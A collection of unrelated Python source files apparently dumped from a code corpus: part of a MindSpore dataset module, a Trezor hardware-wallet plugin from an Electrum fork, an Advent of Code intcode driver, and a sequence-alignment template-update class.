self._children_start_end_index_[index][1] = tem_value
else:
self._children_start_end_index_[index][0] = cumulative_samples_nums
self._children_start_end_index_[index][1] = tem_value % sampler.num_shards
tem_sampler = copy.deepcopy(sampler)
tem_sampler.set_offset(cumulative_samples_nums)
child.use_sampler(tem_sampler)
cumulative_samples_nums += self.children_sizes_[index]
cumulative_samples_nums %= sampler.num_shards
class RenameDataset(UnionBaseDataset):
"""
The result of applying Rename operator to the input Dataset.
Args:
input_dataset (Dataset): Input Dataset to be Renamed.
input_columns (Union[str, list[str]]): List of names of the input columns.
output_columns (Union[str, list[str]]): List of names of the output columns.
"""
def __init__(self, input_dataset, input_columns, output_columns):
super().__init__(children=input_dataset)
self.input_column_names = to_list(input_columns)
self.output_column_names = to_list(output_columns)
def parse(self, children=None):
return cde.RenameNode(children[0], self.input_column_names, self.output_column_names)
def to_list(items):
if items is None:
return []
if isinstance(items, tuple):
return list(items)
if not isinstance(items, list):
return [items]
return items
class ProjectDataset(UnionBaseDataset):
"""
The result of applying Project operator to the input Dataset.
Args:
input_dataset (Dataset): Input Dataset to be Projected.
columns (Union[str, list[str]]): List of names of the columns to project.
"""
def __init__(self, input_dataset, columns):
super().__init__(children=input_dataset)
self.columns = to_list(columns)
def parse(self, children=None):
return cde.ProjectNode(children[0], self.columns)
class _ToDevice:
"""
Internal class to handle sending data to device.
"""
def __init__(self, dataset, num_epochs):
ir_tree, self.api_tree = dataset.create_ir_tree()
self._runtime_context = cde.PythonRuntimeContext()
self._runtime_context.Init()
self._to_device = cde.ToDevice(num_epochs)
self._to_device.Init(ir_tree)
self._runtime_context.AssignConsumer(self._to_device)
ITERATORS_LIST.append(weakref.ref(self))
_unset_iterator_cleanup()
def send(self):
self._to_device.Send()
def reset(self, step):
self._to_device.Reset(step)
def stop_send(self):
"""
send stop send signal to pipeline, it is used when end of sequence is sent at the epoch end.
"""
self._to_device.StopSend()
def continue_send(self):
"""
send continue send signal to pipeline, it is used when end of sequence is sent at the epoch end.
"""
self._to_device.ContinueSend()
def get_data_info(self):
"""
Get type and shape of current batch.
"""
return self._to_device.GetDataInfo()
def release(self):
"""
Manually terminate Device Queue instead of relying on out of scope destruction.
"""
if hasattr(self, '_runtime_context') and self._runtime_context:
if hasattr(self, '_to_device') and self._to_device:
self._runtime_context.Terminate()
del self._to_device
del self._runtime_context
def __deepcopy__(self, memodict):
return self
def get_offload_model(self, col_names):
"""
Get offload model containing removed offload ops from pipeline.
"""
offload_model = GetOffloadModel(self._to_device, col_names)
return offload_model
class TransferDataset(Dataset):
"""
The result of applying TDT operator to the input Dataset.
Args:
input_dataset (Dataset): Input Dataset to be transferred.
send_epoch_end (bool, optional): Whether to send end of sequence to device or not (default=True).
create_data_info_queue (bool, optional): Whether to create queue which stores
types and shapes of data or not (default=False).
Raises:
TypeError: If device_type is empty.
ValueError: If device_type is not 'Ascend', 'GPU' or 'CPU'.
RuntimeError: If dataset is unknown.
"""
def __init__(self, input_dataset, send_epoch_end=True, create_data_info_queue=False):
super().__init__(children=input_dataset)
self.queue_name = str(uuid.uuid1())
self.device_type = context.get_context("device_target") if context else "CPU"
self.device_id = context.get_context("device_id") if context else 0
self._send_epoch_end = replace_none(send_epoch_end, True)
self._create_data_info_queue = create_data_info_queue
self._to_device = None
def parse(self, children=None):
total_batch = 0
if hasattr(self.children[0], "__total_batch__"):
total_batch = self.children[0].__total_batch__
return cde.TransferNode(children[0], self.queue_name, self.device_type, self.device_id, self._send_epoch_end,
total_batch, self._create_data_info_queue)
def create_dict_iterator(self, num_epochs=-1, output_numpy=False):
raise RuntimeError("TransferDataset is not iterable.")
def create_tuple_iterator(self, columns=None, num_epochs=-1, output_numpy=False, do_copy=True):
raise RuntimeError("TransferDataset is not iterable.")
def __iter__(self):
raise RuntimeError("TransferDataset is not iterable.")
def output_shapes(self):
raise RuntimeError("TransferDataset does not support obtaining output_shapes.")
def output_types(self):
raise RuntimeError("TransferDataset does not support obtaining output_types.")
@check_to_device_send
def send(self, num_epochs=-1):
"""
Send to device
"""
if Dataset._noop_mode():
return
if self._to_device is not None:
del self._to_device
self._to_device = _ToDevice(self, num_epochs)
self._to_device.send()
def stop_send(self):
if self._to_device is not None:
self._to_device.stop_send()
def continue_send(self):
if self._to_device is not None:
self._to_device.continue_send()
def reset(self, step):
if self._to_device is not None:
logger.info("Reset the dataset pipeline to step " + str(step))
self._to_device.reset(step)
def get_data_info(self):
"""
Get type and shape of current batch
"""
if self._to_device is not None:
return self._to_device.get_data_info()
raise RuntimeError("Calling get_data_info with bad state.")
def get_offload_model(self):
if self._to_device is not None:
return self._to_device.get_offload_model(self.get_col_names())
raise RuntimeError("get_offload_model, _to_device is None")
def release(self):
"""
Manually terminate Device Queue instead of relying on out of scope destruction.
"""
if self._to_device is not None:
self._to_device.release()
class Schema:
"""
Class to represent a schema of a dataset.
Args:
schema_file(str): Path of the schema file (default=None).
Returns:
Schema object, schema info about dataset.
Raises:
RuntimeError: If schema file failed to load.
Examples:
>>> from mindspore import dtype as mstype
>>>
>>> # Create schema; specify column name, mindspore.dtype and shape of the column
>>> schema = ds.Schema()
>>> schema.add_column(name='col1', de_type=mstype.int64, shape=[2])
"""
@check_schema
def __init__(self, schema_file=None):
self.schema_file = replace_none(schema_file, "")
self.cpp_schema = cde.SchemaObj(self.schema_file)
@check_add_column
def add_column(self, name, de_type, shape=None):
"""
Add new column to the schema.
Args:
name (str): The new name of the column.
de_type (str): Data type of the column.
shape (list[int], optional): Shape of the column
(default=None, [-1] which is an unknown shape of rank 1).
Raises:
ValueError: If column type is unknown.
"""
if isinstance(de_type, typing.Type):
de_type = mstype_to_detype(de_type)
col_type = str(de_type)
else:
col_type = str(cde.DataType(de_type))
if shape is None:
self.cpp_schema.add_column(name, col_type)
else:
self.cpp_schema.add_column(name, col_type, shape)
def parse_columns(self, columns):
"""
Parse the columns and add it to self.
Args:
columns (Union[dict, list[dict], tuple[dict]]): Dataset attribute information, decoded from schema file.
- list[dict], 'name' and 'type' must be in keys, 'shape' optional.
- dict, columns.keys() as name, columns.values() is dict, and 'type' inside, 'shape' optional.
Raises:
RuntimeError: If failed to parse columns.
RuntimeError: If column's name field is missing.
RuntimeError: If column's type field is missing.
Examples:
>>> from mindspore.dataset import Schema
>>> schema = Schema()
>>> columns1 = [{'name': 'image', 'type': 'int8', 'shape': [3, 3]},
... {'name': 'label', 'type': 'int8', 'shape': [1]}]
>>> schema.parse_columns(columns1)
>>> columns2 = {'image': {'shape': [3, 3], 'type': 'int8'}, 'label': {'shape': [1], 'type': 'int8'}}
>>> schema.parse_columns(columns2)
"""
self.cpp_schema.parse_columns(json.dumps(columns, indent=2))
def to_json(self):
"""
Get a JSON string of the schema.
Returns:
str, JSON string of the schema.
"""
return self.cpp_schema.to_json()
def from_json(self, json_obj):
"""
Get schema file from JSON object.
Args:
json_obj(dictionary): Object of JSON parsed.
Raises:
RuntimeError: if there is unknown item in the object.
RuntimeError: if dataset type is missing in the object.
RuntimeError: if columns are missing in the object.
"""
self.cpp_schema.from_string(json.dumps(json_obj, indent=2))
def __str__(self):
return self.to_json()
@staticmethod
def get_num_rows(schema):
schema_obj = schema
if not isinstance(schema_obj, Schema):
schema_obj = Schema(schema_obj)
return schema_obj.cpp_schema.get_num_rows()
class DeserializedDataset(Dataset):
def __init__(self, input_obj):
super().__init__()
self.input_obj = input_obj
def parse(self, children=None):
if isinstance(self.input_obj, dict):
json_str = json.dumps(self.input_obj)
return cde.Dataset.from_json_string(json_str)
return cde.Dataset.from_json_file(self.input_obj)
|
trezor.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from electrum.util import bfh, bh2u, versiontuple, UserCancelled, UserFacingException
from electrum.bitcoin import TYPE_ADDRESS, TYPE_SCRIPT
from electrum.bip32 import deserialize_xpub
from electrum import constants
from electrum.i18n import _
from electrum.plugin import Device
from electrum.transaction import deserialize, Transaction
from electrum.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
RECOVERY_TYPE_SCRAMBLED_WORDS, RECOVERY_TYPE_MATRIX = range(0, 2)
class TrezorKeyStore(Hardware_KeyStore):
hw_type = 'trezor'
device = 'TREZOR'
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise UserFacingException(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class TrezorPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://wallet.trezor.io'
libraries_URL = 'https://github.com/trezor/python-trezor'
minimum_firmware = (1, 5, 2)
keystore_class = TrezorKeyStore
minimum_library = (0, 9, 0)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
from . import client
from . import transport
import trezorlib.messages
self.client_class = client.TrezorClient
self.types = trezorlib.messages
self.DEVICE_IDS = ('TREZOR',)
self.transport_handler = transport.TrezorTransport()
self.device_manager().register_enumerate_func(self.enumerate)
def get_library_version(self):
import trezorlib
try:
return trezorlib.__version__
except AttributeError:
return 'unknown'
def enumerate(self):
devices = self.transport_handler.enumerate_devices()
return [Device(path=d.get_path(),
interface_number=-1,
id_=d.get_path(),
product_key='TREZOR',
usage_page=0,
transport_ui_string=d.get_path())
for d in devices]
def create_client(self, device, handler):
try:
self.print_error("connecting to device at", device.path)
transport = self.transport_handler.get_transport(device.path)
except BaseException as e:
self.print_error("cannot connect at", device.path, str(e))
return None
if not transport:
self.print_error("cannot connect at", device.path)
return
self.print_error("connected to device at", device.path)
# note that this call can still raise!
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
if handler:
handler.show_error(msg)
else:
raise UserFacingException(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Raycoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
model = client.get_trezor_model()
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, model)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
traceback.print_exc(file=sys.stderr)
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection, recovery_type = settings
if method == TIM_RECOVER and recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
if recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS:
recovery_type_trezor = self.types.RecoveryDeviceType.ScrambledWords
else:
recovery_type_trezor = self.types.RecoveryDeviceType.Matrix
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language,
type=recovery_type_trezor)
if recovery_type == RECOVERY_TYPE_MATRIX:
handler.close_matrix_dialog()
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
_, depth, fingerprint, child_num, chain_code, key = deserialize_xpub(xpub)
node = self.types.HDNodeType(
depth=depth,
fingerprint=int.from_bytes(fingerprint, 'big'),
child_num=int.from_bytes(child_num, 'big'),
chain_code=chain_code,
public_key=key,
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise UserFacingException(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_trezor_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.InputScriptType.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.InputScriptType.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.InputScriptType.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_trezor_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.OutputScriptType.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.OutputScriptType.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.OutputScriptType.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
xpubs = wallet.get_master_public_keys()
if len(xpubs) == 1:
script_type = self.get_trezor_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
else:
def f(xpub):
return self._make_node_path(xpub, [change, index])
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
pubkeys = list(map(f, sorted_xpubs))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * wallet.n,
m=wallet.m,
)
script_type = self.get_trezor_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
txinputtype.script_type = self.get_trezor_input_script_type(txin['type'])
else:
def f(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
return self._make_node_path(xpub, s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=list(map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures'))),
m=txin.get('num_sig'),
)
script_type = self.get_trezor_input_script_type(txin['type'])
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx):
def create_output_by_derivation():
script_type = self.get_trezor_output_script_type(info.script_type)
if len(xpubs) == 1:
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
address_n = self.client_class.expand_path("/%d/%d" % index)
pubkeys = [self._make_node_path(xpub, address_n) for xpub in xpubs]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t._extend_inputs(inputs)
for vout in d['outputs']:
o = t._add_bin_outputs()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
part1.py
|
from aoc2019.intcode_computer import IntCodeComputer
import multiprocessing as mp
def part1():
pass
if __name__ == '__main__':
iq = mp.Queue()
oq = mp.Queue()
program = '1102,34915192,34915192,7,4,7,99,0'
program = '109,1,204,-1,1001,100,1,100,1008,100,16,101,1006,101,0,99'
with open('input.txt') as f:
program = f.read()
comp = IntCodeComputer(stdio=True, relative_base=0)
# p = mp.Process(target=comp.run_program, args=(program,), kwargs={'mem': 10000,
# 'input_queue': iq,
# 'output_queues': [oq]})
comp.run_program(program, mem=10000)
# 3989758265: right answer!
# p.start()
# # iq.put(1)
# p.join()
#
#
# while True:
# try:
# print(oq.get(block=False))
# except:
# break
# incorrecrt: 203 - too low
|
TemplateUpdate.py
|
import numpy as np
import pandas as pd
from multiprocessing import Process, Queue, current_process, freeze_support, cpu_count
from NW import NW
from DTW import DTW
from utils import *
import copy
import random
class TemplateUpdate(object):
def __init__(self,executor,thetag = 0.4,cpu=0):
self.executor = executor
self.mode = type(executor).__name__
self.thetag = thetag
self.cpu= cpu
def execute(self,one_seqs):
one_seqs_t = copy.deepcopy(one_seqs)
### MSA_amended
MSA_index = [i for i in range(len(one_seqs_t))]
MSA_columns = [i for i in range(len(one_seqs_t))]
MSA_scores = pd.DataFrame(np.zeros([len(one_seqs_t),len(one_seqs_t)]),index=MSA_index,columns=MSA_columns)
##################
if self.cpu == 0:
if self.mode == 'NW':
for i in range(len(one_seqs_t)):
for j in range(i+1,len(one_seqs_t)):
score_t = self.executor.execute(one_seqs_t[i], one_seqs_t[j], 0)
MSA_scores.iloc[i,j] = score_t.iloc[len(one_seqs_t[i]),len(one_seqs_t[j])]
else:
for i in range(len(one_seqs_t)):
for j in range(i+1,len(one_seqs_t)):
score_t = self.executor.execute(one_seqs_t[i], one_seqs_t[j], 0)
MSA_scores.iloc[i,j] = score_t.iloc[len(one_seqs_t[i])-1,len(one_seqs_t[j])-1]
##################
else:
PROCESSES = cpu_count()
if PROCESSES > 20:
PROCESSES = 20
#NW for every line
TASKS1 = [(self.executor.execute, (one_seqs_t[i], one_seqs_t[j], 0), (i,j)) for i in range(len(one_seqs_t)) for j in range(i+1,len(one_seqs_t))]
task_queue = Queue()
done_queue = Queue()
# Submit tasks
for task in TASKS1:
task_queue.put(task)
# Start worker processes
for i in range(PROCESSES):
Process(target=worker, args=(task_queue, done_queue)).start()
# Get and print results
# print('Unordered results:')
for i in range(len(TASKS1)):
temp = done_queue.get()
# print('temp: ', temp)
if self.mode == 'NW':
MSA_scores.iloc[temp[1][0], temp[1][1]] = temp[0].iloc[len(one_seqs_t[temp[1][0]]),len(one_seqs_t[temp[1][1]])]
elif self.mode == 'DTW':
MSA_scores.iloc[temp[1][0], temp[1][1]] = temp[0].iloc[len(one_seqs_t[temp[1][0]]) - 1,len(one_seqs_t[temp[1][1]]) - 1]
else:
print('mode error!')
for i in range(PROCESSES):
task_queue.put('STOP')
for i in range(len(one_seqs_t)):
for j in range(0,i+1):
MSA_scores.iloc[i,j] = np.nan
# print("MSA_scores:",MSA_scores)
MSA_index = [[] for i in range(len(one_seqs_t))]
for tt in range(len(one_seqs_t) - 1):
###merge
if self.mode == 'NW':
MSA_scores_min = MSA_scores[MSA_scores==MSA_scores.max().max()].dropna(axis=1, thresh=1).dropna(thresh=1)
elif self.mode == 'DTW':
MSA_scores_min = MSA_scores[MSA_scores==MSA_scores.min().min()].dropna(axis=1, thresh=1).dropna(thresh=1)
else:
print("mode error!")
MSA_scores_min_index = MSA_scores_min.index[0]
MSA_scores_min_columns = MSA_scores_min.columns[0]
# print("MSA_scores_min_index:",MSA_scores_min_index)
# print("MSA_scores_min_columns:",MSA_scores_min_columns)
score_t, s1_t, s2_t = self.executor.execute(one_seqs_t[MSA_scores_min_index], one_seqs_t[MSA_scores_min_columns], 1)
# print('s1_t: ',s1_t)
# print('s2_t: ',s2_t)
s1_list = []
q1 = Queue()
q1.put(MSA_scores_min_index)
while(q1.qsize() > 0):
temp_index = q1.get()
s1_list.append(temp_index)
for i in range(len(MSA_index[temp_index])):
q1.put(MSA_index[temp_index][i])
# print('s1_list: ',s1_list)
s2_list = []
q2 = Queue()
q2.put(MSA_scores_min_columns)
while(q2.qsize() > 0):
temp_index = q2.get()
s2_list.append(temp_index)
for i in range(len(MSA_index[temp_index])):
q2.put(MSA_index[temp_index][i])
# print('s2_list: ',s2_list)
for i in range(len(s1_t)):
if s1_t[i] == '_':
for j in s1_list:
one_seqs[j].insert(i,'_')
if s2_t[i] == '_':
for j in s2_list:
one_seqs[j].insert(i,'_')
# print('mended:')
# for i in (s1_list + s2_list):
# print(one_seqs[i])
sMerge = []
for i in range(len(s1_t)):
temp_list = [one_seqs[j][i] for j in (s1_list + s2_list)]
while('_' in temp_list):
temp_list.remove('_')
if len(temp_list) > 0:
sMerge.append('{:02x}'.format(int(np.mean([int(temp_list[j],16) for j in range(len(temp_list))]))))
# print('sMerge: ',sMerge)
MSA_index[MSA_scores_min_index].append(MSA_scores_min_columns)
one_seqs_t[MSA_scores_min_index] = sMerge
for i in range(MSA_scores_min_columns):
MSA_scores.iloc[i,MSA_scores_min_columns] = np.nan
for i in range(MSA_scores_min_columns+1,len(one_seqs_t)):
MSA_scores.iloc[MSA_scores_min_columns,i] = np.nan
for i in range(MSA_scores_min_index):
if np.isnan(MSA_scores.iloc[i,MSA_scores_min_index]):
continue
else:
score_t= self.executor.execute(one_seqs_t[i], one_seqs_t[MSA_scores_min_index], 0)
if self.mode == 'NW':
MSA_scores.iloc[i,MSA_scores_min_index] = score_t.iloc[len(one_seqs_t[i]),len(one_seqs_t[MSA_scores_min_index])]
elif self.mode == 'DTW':
MSA_scores.iloc[i,MSA_scores_min_index] = score_t.iloc[len(one_seqs_t[i])-1,len(one_seqs_t[MSA_scores_min_index])-1]
else:
print("mode error!")
for i in range(MSA_scores_min_index+1,len(one_seqs_t)):
if np.isnan(MSA_scores.iloc[MSA_scores_min_index,i]):
continue
else:
score_t= self.executor.execute(one_seqs_t[i], one_seqs_t[MSA_scores_min_index], 0)
if self.mode == 'NW':
MSA_scores.iloc[MSA_scores_min_index,i] = score_t.iloc[len(one_seqs_t[i]),len(one_seqs_t[MSA_scores_min_index])]
elif self.mode == 'DTW':
MSA_scores.iloc[MSA_scores_min_index,i] = score_t.iloc[len(one_seqs_t[i])-1,len(one_seqs_t[MSA_scores_min_index])-1]
else:
print("mode error!")
# print("MSA_scores-mended:",MSA_scores)
one_seqs = np.array(one_seqs)
new_two_seq = []
gap_num = 0
for i in range(len(one_seqs[0])):
temp_l = list(one_seqs[:,i])
_num = temp_l.count('_')
if _num > len(temp_l)*self.thetag:
gap_num += 1
continue
else:
while('_' in temp_l):
temp_l.remove('_')
new_two_seq.append('{:02x}'.format(int(round(np.mean([int(temp_l[j],16) for j in range(len(temp_l))])))))
if len(one_seqs)>=4:
if (gap_num >= len(one_seqs[0])*0.4) or (list(one_seqs[0]).count('_') >= len(one_seqs[0])*0.4) or (list(one_seqs[1]).count('_') >= len(one_seqs[1])*0.4):
new_two_seq_t = np.array(list(one_seqs[0]) + list(one_seqs[1]))
gap_pos = np.where(new_two_seq_t != '_')
new_two_seq = list(new_two_seq_t[gap_pos])
tmpseqs_pos = np.where(one_seqs[0] != '_')
tmpseqs = one_seqs[0][tmpseqs_pos]
if len(one_seqs[0]) >= 30:
new_two_seq = list(tmpseqs[:int(len(tmpseqs)/2 + random.choice([-1,0,1]))])
elif len(tmpseqs) < 3:
new_two_seq_t = np.array(list(one_seqs[0]) + list(one_seqs[1]))
